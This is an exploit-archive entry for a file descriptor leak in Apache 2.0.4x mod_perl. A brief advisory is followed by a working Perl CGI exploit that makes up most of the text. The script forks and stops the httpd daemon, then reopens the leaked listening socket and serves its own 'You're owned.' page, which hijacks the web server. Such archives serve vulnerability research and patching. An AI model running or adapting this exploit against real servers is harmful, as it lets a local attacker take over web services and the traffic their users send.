Apache 2.0.4x mod_perl - File Descriptor Leakage (3)

source: https://www.securityfocus.com/bid/9471/info

A vulnerability has been reported to exist in the Apache mod_perl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attacks are also possible.

It has been reported that multiple file descriptors, are leaked to the mod_perl module and any processes it creates. This allows for Perl scripts and any processes they spawn to access the privileged I/O streams.

#!/usr/bin/perl

use POSIX qw(setsid);

if (!defined(my $pid = fork)) {
        print "Content-Type: text/html\n\n";
        print "cannot fork: $!";
        exit 1;
} elsif ($pid) { # This is the parent
        sleep(1);
        print "Content-Type: text/html\n\n";
        print "<html><body>Exploit installed</body></html>";
        system '/usr/sbin/httpd2 -k stop';
        sleep(2);
        exit 0;
}

# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
        my $rin = '';
        vec($rin,fileno(Server),1) = 1;
        $nfound = select($rout = $rin, undef, undef, undef);
        if (accept(Client,Server) ) {
                print Client "HTTP/1.0 200 OK\n";
                print Client "Content-Length: 40\n";
                print Client "Content-Type: text/html\n\n";
                print Client "<html><body>";
                print Client "You're owned.";
                print Client "</body></html>";
                close Client;
        }
}